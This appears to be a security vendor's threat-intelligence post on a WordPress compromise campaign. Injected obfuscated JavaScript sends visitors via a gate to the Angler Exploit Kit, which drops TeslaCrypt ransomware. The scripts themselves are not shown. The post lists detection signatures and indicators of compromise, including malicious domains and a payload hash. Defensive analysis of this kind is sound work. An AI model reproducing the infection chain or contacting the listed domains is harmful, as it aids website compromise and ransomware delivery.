In the past week, a massive campaign targeting WordPress-based websites has been reported by several security vendors, including Sucuri and Malwarebytes. In the previous iteration, unsuspecting victims were redirected to domains hosting ads which, if clicked, sent them to the Nuclear Exploit Kit landing page. Check Point security analysts have recently observed a change in the process – victims are now sent to the notorious Angler Exploit Kit landing page.
An obfuscated malicious script is appended to the end of the infected websites’ JS files. When the user’s browser loads the page, the script redirects to a gate controlled by the malicious actor.
This is the obfuscated script; everything after the comment is injected into the original script:
After two layers of obfuscation, we can see an iframe that redirects the victim to the actor’s gate:
The gate then responds with another script which examines the user’s browser. It then writes and submits a form object to the page, generating a POST request.
The POST response contains the following script, which redirects users to the Angler Exploit Kit Landing Page
The payload can vary at the threat actor’s discretion. In this particular instance, the payload used is the TeslaCrypt ransomware. At present, not many security vendors are familiar with this component of the ransomware, as its VirusTotal detection is relatively low.
Check point software blades provide protection against all stages of the infection chain:
- Anti-Virus and Anti-Bot Blades provide protection against all known variants of the TeslaCrypt (Trojan-Ransom.Win32.TeslaCrypt; Operator.Teslacrypt)
- IPS Blade provides protection against all known variants of the Angler Exploit Kit (Angler Exploit Kit Redirection; Angler Exploit Kit Landing Page; Angler Exploit Kit Landing Page URL; Angler Exploit Kit Landing Page Patterns)
Indicators of compromise:
- a8f71638d511d60c7bf8c3de1f7951d7 – Payload MD5
- krasnayadama[.]info – Gate Domain
- emilyg[.]info – Angler Exploit Kit domain